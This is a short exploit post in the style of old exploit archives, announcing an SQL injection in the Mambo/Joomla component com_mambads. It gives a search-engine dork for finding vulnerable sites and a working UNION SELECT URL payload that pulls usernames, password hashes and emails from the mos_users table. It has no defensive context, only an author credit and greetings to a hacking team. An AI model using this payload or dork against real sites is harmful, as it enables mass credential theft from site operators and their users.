1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
============================================================================== [»] Mambo com_mambads Remote Sql Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder:[ Dreadful Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ His0k4sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] [»] Dork :[ inurl:index.php?option=com_mambads ########################################################################### ===[ Exploit ]=== [»] http://server/index.php?option=com_mambads&Itemid=39&func=view&cacat=33&casb=1+UNION all SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password,0x3a,email),17,18,19,20,21,22,23+from+mos_users-- [»]Author: Dreadful <- ########################################################################### |